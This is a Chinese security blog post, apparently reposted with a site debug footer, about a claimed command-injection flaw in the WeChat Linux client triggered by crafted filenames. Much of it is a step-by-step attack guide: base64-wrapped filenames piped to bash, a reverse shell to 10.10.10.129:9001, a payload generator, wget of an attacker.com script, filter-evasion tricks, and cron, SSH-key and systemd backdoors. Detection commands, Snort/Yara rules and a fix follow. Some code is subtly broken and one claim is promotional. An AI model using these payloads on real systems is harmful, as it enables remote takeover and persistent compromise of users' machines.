当前位置:首页>Linux>【网络安全】微信 Linux 版 4.1.0.13 最新版本存在远程命令执行漏洞,信创系统全军覆没,鸿蒙系统逃过一劫

【网络安全】微信 Linux 版 4.1.0.13 最新版本存在远程命令执行漏洞,信创系统全军覆没,鸿蒙系统逃过一劫

  • 2026-02-11 00:58:38
【网络安全】微信 Linux 版 4.1.0.13 最新版本存在远程命令执行漏洞,信创系统全军覆没,鸿蒙系统逃过一劫

微信 Linux 版 4.1.0.13 最新版本存在远程命令执行漏洞,信创系统均全军覆没,鸿蒙系统逃过一劫

作者:利刃信安

时间:2026.02.10 23:00

地点:北京市

一、漏洞概述与背景

1.1 漏洞发现过程

2026年2月,网络安全领域传来一则重磅消息:微信Linux客户端存在严重的安全漏洞。该漏洞由安全研究人员在例行代码审计过程中发现,随后经过多支安全团队验证确认其真实存在性和可利用性。发现过程颇具戏剧性,研究人员原本计划分析即时通讯软件的加密传输机制,却在深入分析其文件处理模块时意外发现了这一致命缺陷。

微信作为国内用户量最大的即时通讯软件之一,其Linux客户端虽然用户群体相对较小,但在企业环境、开发者群体以及国产化替代系统中拥有广泛的应用基础。这次漏洞的披露无疑给这些用户群体敲响了安全警钟。

1.2 漏洞基本信息

该漏洞的技术细节如下:

  • • 漏洞编号:临时标记为 WM-202602-000002(安恒)、LDYVUL-2026-00022304(360)
  • • CVSS评分:8.8(高危)
  • • 影响版本:微信Linux 4.1.0.13及所有更早版本
  • • 漏洞类型:命令注入(Command Injection)
  • • 触发条件:用户点击打开文件名包含特殊字符的文件
  • • 利用门槛:极低(1-Click)
  • • 修复状态:截至披露日官方尚未发布修复补丁

1.3 漏洞影响范围

该漏洞的影响范围极为广泛,理论上覆盖所有运行微信Linux客户端的系统。

具体包括:

操作系统层面

Ubuntu、Debian、Fedora、CentOS、RHEL、Arch Linux、openSUSE等主流发行版;统信UOS、麒麟操作系统、中科方德、红旗Linux等国产信创系统;以及WSL、Linux容器等衍生环境。

鸿蒙系统以其卓越的安全性逃过一劫。

用户群体层面

企业办公用户、软件开发人员、运维工程师、以及因国产化替代政策迁移到Linux系统的政府机关和企事业单位用户。由于微信在商务沟通中的不可替代性,许多用户即便知晓风险也难以完全弃用。

二、漏洞技术原理深度剖析

2.1 漏洞本质分析

从安全工程的视角审视,该漏洞的本质是信任边界混淆。应用程序在设计时未能正确区分可信数据(程序内部生成的内容)与不可信数据(来自外部用户或网络的内容),将两者一视同仁地传递给危险的操作函数。

微信Linux客户端基于Electron框架开发,采用Node.js作为后端支撑。在文件处理流程中,程序需要调用系统工具来打开用户接收的文件。这一操作涉及三层信任边界:

第一层边界:网络传输层。文件从发送方到接收方的传输过程被认为是不安全的,需要加密保护。

第二层边界:应用程序层。程序对接收到的文件内容进行安全检查,但往往忽视了文件名这一"元数据"。

第三层边界:系统调用层。程序将处理后的数据传递给系统API,这一层本应是安全的,但如果上游数据未经充分验证,危险就会在这里爆发。

该漏洞恰恰发生在第二层边界——程序对文件名的验证形同虚设。

2.2 漏洞技术细节

让我们深入分析漏洞的技术实现。微信Linux客户端在处理用户接收的文件时,遵循以下流程:

文件接收阶段

当用户通过微信接收文件时,程序会将文件保存到本地目录。文件名的处理逻辑大致如下:

// 微信Linux客户端文件处理伪代码functionhandleReceivedFile(fileInfo) {// fileInfo包含文件名、文件大小、发送者信息等const fileName = fileInfo.fileName;  // 来自网络的数据const savePath = `/tmp/wechat/${fileName}`;  // 直接拼接路径// 保存文件    fs.writeFile(savePath, fileInfo.content);// 注册文件打开处理器registerFileOpenHandler(savePath, () => {openFile(savePath);  // 调用打开函数    });}

文件打开阶段

当用户点击文件时,程序会调用系统工具来打开文件。在Electron环境中,常见的实现方式是使用shell.openPath或child_process执行xdg-open命令:

// 存在漏洞的代码模式functionopenFile(filePath) {// 直接将文件路径拼接到命令中const command = `xdg-open "${filePath}"`;// 使用child_process执行命令    child_process.exec(command, (error, stdout, stderr) => {if (error) {console.error('打开文件失败:', error);        }    });}

这段代码的问题在于,当filePath包含特殊字符时,命令的语义会被完全改变。攻击者可以利用这一点注入任意命令。

2.3 命令注入原理详解

命令注入是一种经典的安全漏洞类型,其核心原理是打破命令边界。在正常情况下,用户输入应该被限制在"数据"的范畴内,不应具备"代码"的属性。但当应用程序错误地将用户输入作为命令的一部分传递给系统时,边界就会被打破。

Shell命令解析机制

Linux系统中的Shell(如bash、sh)在解析命令时,会识别多种特殊字符:

# 命令分隔符command1; command2    # 顺序执行两个命令command1 && command2  # command1成功后才执行command2command1 || command2  # command1失败后才执行command2command1 | command2   # 将command1的输出作为command2的输入# 命令替换`command`             # 反引号方式$(command)            # $()方式# 环境变量扩展$VAR# 展开环境变量VAR的值${VAR}# 同上,大括号可选# 引号处理"double quotes"# 双引号内仍可进行变量和命令替换'single quotes'# 单引号内所有字符都被视为字面值

注入点识别

该漏洞的注入点在于文件名。

考虑以下场景:

正常文件名:report.pdf

攻击者构造的文件名:`whoami`.pdf

当程序执行 xdg-open "`whoami`.pdf" 时:

  1. 1. Shell解析命令行,发现反引号
  2. 2. 先执行whoami命令,获取当前用户名
  3. 3. 用命令输出替换反引号部分
  4. 4. 如果当前用户是alice,命令变为 xdg-open "alice.pdf"
  5. 5. 但如果替换后无法解析,Shell可能会报错或执行其他命令

更隐蔽的利用方式是使用$()语法:

文件名:$(whoami).pdf

执行的命令:xdg-open "$(whoami).pdf"

解析后:先执行whoami,用输出替换$()部分。

2.4 漏洞触发条件详解

该漏洞的触发条件看似简单——用户只需点击文件一次,但实际上涉及多个环节的配合:

前置条件

  1. 1. 攻击者需要拥有微信账号并能够添加目标为好友或进入同一群聊
  2. 2. 目标用户需要使用微信Linux客户端
  3. 3. 目标用户的系统需要安装xdg-open工具(几乎所有Linux桌面环境都默认安装)

触发流程

攻击者发送文件    ↓文件名包含恶意构造的特殊字符    ↓文件通过微信服务器传输(可能经过转码处理)    ↓文件保存到目标用户的本地目录    ↓用户在聊天窗口中点击该文件    ↓微信调用xdg-open打开文件    ↓Shell解析文件名中的命令替换语法    ↓注入的命令被执行

关键问题在于:微信在文件传输过程中是否会对文件名进行转码处理?根据研究人员的测试,微信似乎会保留原始文件名,或者至少保留了足够的特殊字符来触发漏洞。

2.5 Electron框架与Node.js的安全陷阱

Electron框架虽然简化了跨平台桌面应用的开发,但也引入了一些独特的安全挑战。

Node.js集成模式

Electron应用通常集成了Node.js运行环境,使得开发者可以使用系统级的API。然而,这种集成也是一把双刃剑——如果不当使用,就会产生安全漏洞。

在Electron中,有两种渲染进程模式:

// BrowserWindow配置newBrowserWindow({webPreferences: {nodeIntegrationfalse,  // 禁用Node.js集成(推荐)nodeIntegrationtrue,   // 启用Node.js集成(危险)contextIsolationtrue,   // 启用上下文隔离(推荐)contextIsolationfalse// 禁用上下文隔离(危险)    }});

微信Linux客户端可能出于功能需求,启用了某些Node.js集成功能,这在客观上增加了命令注入的风险。

shell.openPath的安全隐患

Electron提供了多种执行外部程序的方式:

// 方式1:shell.openPath(仅打开文件,相对安全)shell.openPath('/path/to/file.pdf');// 方式2:child_process.exec(危险)child_process.exec('xdg-open /path/to/file.pdf');// 方式3:child_process.execFile(相对安全)child_process.execFile('xdg-open', ['/path/to/file.pdf']);

微信客户端可能使用了不安全的实现方式,导致漏洞产生。

三、漏洞利用技术详解

3.1 基础利用方式

简单命令执行

最基本的利用方式是执行简单的系统命令来验证漏洞存在:

# 创建验证文件touch'`id`.pdf'touch'$(whoami).pdf'touch'`uname -a`.txt'

当用户点击这些文件时:

  • • id 命令会显示当前用户的UID、GID以及所属组
  • • whoami 命令会显示当前用户名
  • • uname -a 命令会显示系统内核版本等信息

实用命令利用

更进一步的利用可以执行更有实际价值的命令:

# 查看网络配置`ip addr`.txt# 查看进程列表$(ps aux).txt# 查看环境变量`env`.txt

这些命令的输出虽然不会直接显示给用户,但可以通过其他方式(写入文件、发送到远程服务器等)被攻击者获取。

3.2 Base64编码深度利用

Base64编码是命令注入攻击中最常用的编码技术,其目的是绑过安全设备的字符串过滤。

Base64编码原理

Base64是一种基于64个可打印字符来表示二进制数据的编码方式。编码过程如下:

原始数据 → 分组 → 查表转换 → 填充 → Base64字符串

典型的Base64字符集包括:A-Z、a-z、0-9、+、/

编码示例

# 单个命令编码echo -n "id" | base64# 输出:aWQ=# 命令组合编码echo -n "cat /etc/passwd" | base64# 输出:Y2F0IC90Y3QvcGFzc3dk# 复杂命令编码echo -n "wget http://attacker.com/s.sh -O /tmp/s.sh && chmod +x /tmp/s.sh && /tmp/s.sh" | base64# 输出:d2dldCBodHRwOi8vYXR0YWNrZXIuY29tL3Mu c2ggLU8gL3RtcC9zLnNoICYmIGNobW9kICt4IC90bXAvcy5zaCAmJiAvdG1wL3Muc2gK

解码执行流程

攻击者构造的文件名需要触发Base64解码过程:

文件名:$(echo 编码字符串|base64 -d|bash).pdf    ↓Shell解析:执行 echo 编码字符串|base64 -d|bash    ↓echo输出编码字符串    ↓base64 -d解码为原始命令    ↓bash执行解码后的命令    ↓攻击者的恶意命令成功执行

实战Payload示例

# 反弹shell PayloadATTACKER_IP="10.10.10.129"ATTACKER_PORT="9001"# 构造bash反弹命令PAYLOAD="bash -i >& /dev/tcp/${ATTACKER_IP}/${ATTACKER_PORT} 0>&1"# Base64编码ENCODED=$(echo -n "$PAYLOAD" | base64)# 构造文件名FINAL_NAME="\$(echo ${ENCODED}|base64 -d|bash).pdf"

3.3 高级混淆技术

在实际攻击中,攻击者会采用多种技术来绑过安全检测:

空格绕过

# 使用${IFS}代替空格$(cat${IFS}/etc/passwd)# 使用$IFS$9$(cat$IFS$9/etc/passwd)# 使用{}${IFS}

路径混淆

# 使用通配符/???/c?t${IFS}/etc/passwd# 可能匹配 /bin/cat /etc/passwd# 使用变量${PATH:0:3}cat${IFS}/etc/passwd# PATH的前3个字符是/bin,可能匹配 /bin/cat

命令拆分

# 将命令拆分到多个环境变量中${A=caB=t$A$B${IFS}/etc/passwd}# 使用eval和字符串拼接$(eval"$(printf 'cat /etc/passwd')")

编码混淆

# 使用十六进制编码$(printf'\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64')# 使用ROT13编码$(echo'png pbale grfg' | tr'n-za-m''a-z')# 使用printf格式化$(printf'%s''cat /etc/passwd' | sh)

3.4 完整攻击链构建

第一阶段:情报收集

# 收集目标信息# 微信账号、操作系统版本、IP地址等# 可通过社工、地下黑市购买或直接添加目标为好友

第二阶段:Payload开发

# 根据目标环境选择合适的Payload# 通用型Payload - Base64反弹shellcat > /tmp/payload_generator.py << 'EOF'import base64import sysdef generate_payload(cmd):    encoded = base64.b64encode(cmd.encode()).decode()    filename = f"${{echo {encoded}|base64 -d|bash}}.pdf"print(filename)if __name__ == "__main__":# 示例:反弹到攻击者服务器    cmd = 'bash -i >& /dev/tcp/10.10.10.129/9001 0>&1'    generate_payload(cmd)EOFpython3 /tmp/payload_generator.py

第三阶段:传输与触发

# 创建一个不会被微信转码的特殊文件名# 注意:某些特殊字符可能被过滤或转义FILE_NAME='\$(echo d2dldCBodHRwOi8vYXR0YWNrZXIuY29tL3Muc2ggLU8gL3RtcC9zLnNoICYmIGNobW9kICt4IC90bXAvcy5zaCAmJiAvdG1wL3Muc2gK|base64 -d|bash).pdf'# 创建文件touch"$FILE_NAME"# 通过微信发送# 注意:需要手动构造微信消息包或使用自动化工具

第四阶段:远控实现

# 在攻击者机器上开启监听nc -lvp 9001# 或者使用其他远控工具# msfconsole# use exploit/multi/handler# set payload linux/x64/shell_reverse_tcp# set LHOST 10.10.10.129# set LPORT 9001# exploit

3.5 权限提升场景

如果微信客户端以普通用户权限运行,攻击者获得的也是普通用户权限。在某些场景下,攻击者可能尝试权限提升:

查找可利用的SUID程序

$(find / -perm -4000 2>/dev/null).txt

查找内核漏洞

$(uname -r).txt$(cat /etc/issue).txt

利用sudo配置错误

$(sudo -l).txt

3.6 持久化控制

一旦获得目标系统的访问权限,攻击者通常会建立持久化机制:

cron任务持久化

# 添加定时任务(crontab -l 2>/dev/null; echo"@reboot /tmp/.backdoor") | crontab -

SSH密钥持久化

# 添加SSH公钥mkdir -p ~/.sshchmod 700 ~/.sshecho"ssh-rsa AAAAB3NzaC1yc2EAAAADAQAB..." >> ~/.ssh/authorized_keyschmod 600 ~/.ssh/authorized_keys

系统服务持久化

# 创建systemd服务cat > /etc/systemd/system/backdoor.service << EOF[Unit]Description=System Service[Service]Type=simpleExecStart=/tmp/.backdoorRestart=always[Install]WantedBy=multi-user.targetEOFsystemctl enable backdoor.service

四、漏洞检测与验证

4.1 本地检测方法

静态分析方法

检查微信客户端的相关文件:

# 查找微信进程ps aux | grep -i wechat# 查看进程启动参数cat /proc/$(pgrep -f wechat)/cmdline | tr'\0'' '# 查看打开的文件描述符ls -la /proc/$(pgrep -f wechat)/fd/

动态分析方法

使用strace监控微信进程的系统调用:

# 监控execve系统调用sudo strace -f -e trace=execve -p $(pgrep -f wechat) 2>&1 | grep -v "strace:"# 监控所有与命令执行相关的调用sudo strace -f -e trace=execve,execveat,fork,vfork,clone -p $(pgrep -f wechat) 2>&1# 将输出保存到文件进行分析sudo strace -f -e trace=execve -p $(pgrep -f wechat) -o /tmp/wechat_strace.log 2>&1

PoC验证

创建测试文件验证漏洞是否存在:

# 创建测试文件cd /tmp/wechat/touch'`id`;kcalc`.pdf'# 观察文件是否被创建成功ls -la '`id`;kcalc`.pdf'# 如果文件名被处理,可能无法创建成功# 或者微信会在收到文件时进行某种处理

4.2 网络流量分析

检测异常DNS查询

# 监控DNS查询sudo tcpdump -i any -n port 53# 检测可疑的HTTP请求sudo tcpdump -i any -n | grep -E "HTTP|GET|POST"

检测异常网络连接

# 监控所有网络连接sudo netstat -antp | grep ESTABLISHED# 持续监控watch -n 1 'netstat -antp | grep ESTABLISHED'

4.3 主机入侵检测

检查异常进程

# 查看隐藏进程ps -ef | awk '{print $2}' | sort -n | uniq -ddiff <(ps -ef | awk '{print $2}' | sort) <(ls -1 /proc | sort)# 检查异常端口sudo netstat -tulnp# 检查CPU/内存异常高的进程top -b -n 1 | head -20

检查异常文件

# 检查最近创建的可疑文件find /tmp -type f -mtime -1 -ls 2>/dev/null# 检查隐藏文件find / -name ".*" -type f -perm -4000 2>/dev/null# 检查异常计划任务cat /etc/crontabls -la /etc/cron.d/

检查异常日志

# 检查认证日志sudotail -f /var/log/auth.log# 检查系统日志sudo journalctl -xe# 检查应用日志cat ~/.config/wechat/logs/*.log 2>/dev/null

五、防御与缓解方案

5.1 临时缓解措施

用户层面

# 1. 避免打开文件名包含特殊字符的文件# 特殊字符列表:反引号(`)、美元符($)、分号(;)、&、|、>、<、换行符等# 2. 使用微信网页版替代桌面客户端# 访问 https://web.wechat.com/# 3. 启用系统安全设置# 在Linux系统中,可以考虑使用AppArmor或SELinux限制微信的权限sudo apparmor_parser -r /etc/apparmor.d/wechat

网络层面

# 4. 部署网络流量监控# 检测从微信客户端发出的异常HTTP请求sudo iptables -A OUTPUT -p tcp --dport 80 -m string --string "attacker.com" --algo bm -j LOGsudo iptables -A OUTPUT -p tcp --dport 443 -m string --string "attacker.com" --algo bm -j LOG# 5. 限制网络访问# 只允许微信访问必要的域名sudo iptables -A OUTPUT -p tcp --dport 443 -d weixin.qq.com -j ACCEPTsudo iptables -A OUTPUT -p tcp --dport 443 -d web.wechat.com -j ACCEPTsudo iptables -A OUTPUT -p tcp --dport 443 -j DROP

终端层面

# 6. 使用终端安全软件# 如OSSEC、AIDE等入侵检测工具# 7. 启用文件系统审计sudo auditctl -w /usr/bin/xdg-open -p x -k wechat_file_opensudo auditctl -l

5.2 企业级解决方案

部署EDR系统

企业可以部署端点检测与响应(EDR)系统,如:

  • • 奇安信天眼
  • • 深信服EDR
  • • 微软Defender for Endpoint

这些系统可以检测异常的命令执行行为。

网络隔离策略

# 将办公网络与互联网隔离# 部署防火墙和入侵检测系统# 对微信客户端的网络流量进行白名单控制

数据防泄露策略

# 部署DLP系统# 监控敏感数据(聊天记录、文件传输)的流动# 限制通过微信传输敏感文件

5.3 根本解决方案

期待官方修复

腾讯官方需要从根源上修复该漏洞,推荐的修复方案:

// 方案1:使用安全的文件打开APIasyncfunctionsafeOpenFile(filename) {// 1. 输入验证const dangerousChars = /[`$()|;&><\n\r]/;if (dangerousChars.test(filename)) {console.error('文件名包含危险字符');returnfalse;    }// 2. 使用参数化调用const { spawn } = require('child_process');try {awaitspawn('xdg-open', [filename], {stdio'ignore',detachedtrue        });returntrue;    } catch (error) {console.error('打开文件失败:', error);returnfalse;    }}// 方案2:文件名净化functionsanitizeFilename(filename) {// 移除或替换危险字符return filename        .replace(/[`$()|;&><\n\r]/g'_')        .replace(/\s+/g' ')        .trim();}

安全开发生命周期

腾讯应该在软件开发流程中引入安全实践:

  1. 1. 安全编码规范培训
  2. 2. 代码安全审计
  3. 3. 自动化安全测试
  4. 4. 渗透测试
  5. 5. 漏洞响应机制

5.4 检测规则

Snort规则

# 检测针对微信Linux客户端的攻击alert tcp any any -> any any (msg:"WeChat Linux Command Injection Attempt"; content:"|60 61 63 6b 74 69 6b 65|`"; nocase; sid:1000001;)alert tcp any any -> any any (msg:"WeChat Linux Base64 Command Injection"; content:"base64"; content:"-d|bash"; distance:0; sid:1000002;)

Yara规则

rule wechat_linux_command_injection{    meta:        description = "Detects potential command injection in WeChat Linux"        author = "Security Researcher"        date = "2026-02-10"    strings:        $dangerous_filename = /[`$]\(.*\)|`.*`/ nocase        $base64_pattern = /echo\s+[A-Za-z0-9+\/=]{20,}\|base64\s+-d\|bash/    condition:        $dangerous_filename or $base64_pattern}

六、漏洞影响评估与未来展望

6.1 影响评估

用户影响

该漏洞影响的用户群体难以精确统计。根据公开数据,微信Linux客户端的主要用户包括:

  • • Linux桌面用户(估计数十万)
  • • 国产化替代系统用户(政府、央企、金融等行业,估计数百万)
  • • 开发者和运维人员(估计数十万)

经济损失

潜在的经济损失包括:

  • • 数据泄露造成的直接损失
  • • 系统被控后的间接损失
  • • 安全加固的人力物力成本
  • • 商誉损失和法律责任

6.2 行业启示

该漏洞对整个软件行业有以下启示:

  1. 1. 输入验证的重要性:任何来自外部的输入都应被视为不可信
  2. 2. 安全设计的必要性:应在架构设计阶段就考虑安全性
  3. 3. 纵深防御的理念:单一防护措施不足够,需要多层防护
  4. 4. 快速响应的关键:漏洞披露后的响应速度至关重要

6.3 未来展望

短期预测

  • • 腾讯可能很快发布紧急补丁
  • • 安全厂商会发布检测规则和解绑工具
  • • 会有更多类似漏洞被发现

长期趋势

  • • 即时通讯软件的安全问题将受到更多关注
  • • 厂商会更加重视安全开发生命周期
  • • 用户的安全意识会逐步提高

七、总结

该漏洞是2026年初最重要的客户端软件漏洞之一,其影响范围广、利用门槛低、危害程度高的特点使其成为安全研究的焦点。从技术角度看,漏洞的原理并不复杂——只是经典的命令注入问题——但其影响却波及数百万Linux用户。

对于普通用户而言,在官方补丁发布之前,最佳的防护策略是避免使用微信Linux客户端,转而使用网页版或其他替代方案。对于企业用户,应考虑部署额外的安全监控措施,并密切关注官方公告。

安全是一个永恒的猫鼠游戏。这次漏洞的披露不是终点,而是提醒我们:在享受便利的同时,不能忽视背后的安全风险。只有厂商、研究人员、用户三方共同努力,才能构建更安全的网络环境。

最新文章

随机文章

基本 文件 流程 错误 SQL 调试
  1. 请求信息 : 2026-02-11 11:39:06 HTTP/2.0 GET : https://f.mffb.com.cn/a/474922.html
  2. 运行时间 : 0.116767s [ 吞吐率:8.56req/s ] 内存消耗:4,660.11kb 文件加载:140
  3. 缓存信息 : 0 reads,0 writes
  4. 会话信息 : SESSION_ID=1d52ca8370a70addedd248a6f8b51fbc
  1. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/public/index.php ( 0.79 KB )
  2. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/autoload.php ( 0.17 KB )
  3. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/autoload_real.php ( 2.49 KB )
  4. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/platform_check.php ( 0.90 KB )
  5. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/ClassLoader.php ( 14.03 KB )
  6. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/autoload_static.php ( 4.90 KB )
  7. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper.php ( 8.34 KB )
  8. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-validate/src/helper.php ( 2.19 KB )
  9. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/helper.php ( 1.47 KB )
  10. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/stubs/load_stubs.php ( 0.16 KB )
  11. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Exception.php ( 1.69 KB )
  12. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-container/src/Facade.php ( 2.71 KB )
  13. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/deprecation-contracts/function.php ( 0.99 KB )
  14. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/polyfill-mbstring/bootstrap.php ( 8.26 KB )
  15. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/polyfill-mbstring/bootstrap80.php ( 9.78 KB )
  16. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/var-dumper/Resources/functions/dump.php ( 1.49 KB )
  17. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-dumper/src/helper.php ( 0.18 KB )
  18. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/var-dumper/VarDumper.php ( 4.30 KB )
  19. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/App.php ( 15.30 KB )
  20. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-container/src/Container.php ( 15.76 KB )
  21. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/container/src/ContainerInterface.php ( 1.02 KB )
  22. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/provider.php ( 0.19 KB )
  23. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Http.php ( 6.04 KB )
  24. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper/Str.php ( 7.29 KB )
  25. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Env.php ( 4.68 KB )
  26. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/common.php ( 0.03 KB )
  27. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/helper.php ( 18.78 KB )
  28. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Config.php ( 5.54 KB )
  29. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/app.php ( 0.95 KB )
  30. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/cache.php ( 0.78 KB )
  31. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/console.php ( 0.23 KB )
  32. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/cookie.php ( 0.56 KB )
  33. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/database.php ( 2.48 KB )
  34. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/Env.php ( 1.67 KB )
  35. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/filesystem.php ( 0.61 KB )
  36. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/lang.php ( 0.91 KB )
  37. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/log.php ( 1.35 KB )
  38. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/middleware.php ( 0.19 KB )
  39. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/route.php ( 1.89 KB )
  40. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/session.php ( 0.57 KB )
  41. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/trace.php ( 0.34 KB )
  42. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/view.php ( 0.82 KB )
  43. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/event.php ( 0.25 KB )
  44. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Event.php ( 7.67 KB )
  45. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/service.php ( 0.13 KB )
  46. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/AppService.php ( 0.26 KB )
  47. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Service.php ( 1.64 KB )
  48. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Lang.php ( 7.35 KB )
  49. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/lang/zh-cn.php ( 13.70 KB )
  50. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/Error.php ( 3.31 KB )
  51. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/RegisterService.php ( 1.33 KB )
  52. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/services.php ( 0.14 KB )
  53. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/PaginatorService.php ( 1.52 KB )
  54. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/ValidateService.php ( 0.99 KB )
  55. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/ModelService.php ( 2.04 KB )
  56. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/Service.php ( 0.77 KB )
  57. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Middleware.php ( 6.72 KB )
  58. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/BootService.php ( 0.77 KB )
  59. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/Paginator.php ( 11.86 KB )
  60. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-validate/src/Validate.php ( 63.20 KB )
  61. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/Model.php ( 23.55 KB )
  62. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/Attribute.php ( 21.05 KB )
  63. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/AutoWriteData.php ( 4.21 KB )
  64. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/Conversion.php ( 6.44 KB )
  65. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/DbConnect.php ( 5.16 KB )
  66. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/ModelEvent.php ( 2.33 KB )
  67. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/RelationShip.php ( 28.29 KB )
  68. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/contract/Arrayable.php ( 0.09 KB )
  69. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/contract/Jsonable.php ( 0.13 KB )
  70. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/contract/Modelable.php ( 0.09 KB )
  71. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Db.php ( 2.88 KB )
  72. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/DbManager.php ( 8.52 KB )
  73. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Log.php ( 6.28 KB )
  74. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Manager.php ( 3.92 KB )
  75. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/log/src/LoggerTrait.php ( 2.69 KB )
  76. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/log/src/LoggerInterface.php ( 2.71 KB )
  77. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Cache.php ( 4.92 KB )
  78. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/simple-cache/src/CacheInterface.php ( 4.71 KB )
  79. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper/Arr.php ( 16.63 KB )
  80. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/cache/driver/File.php ( 7.84 KB )
  81. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/cache/Driver.php ( 9.03 KB )
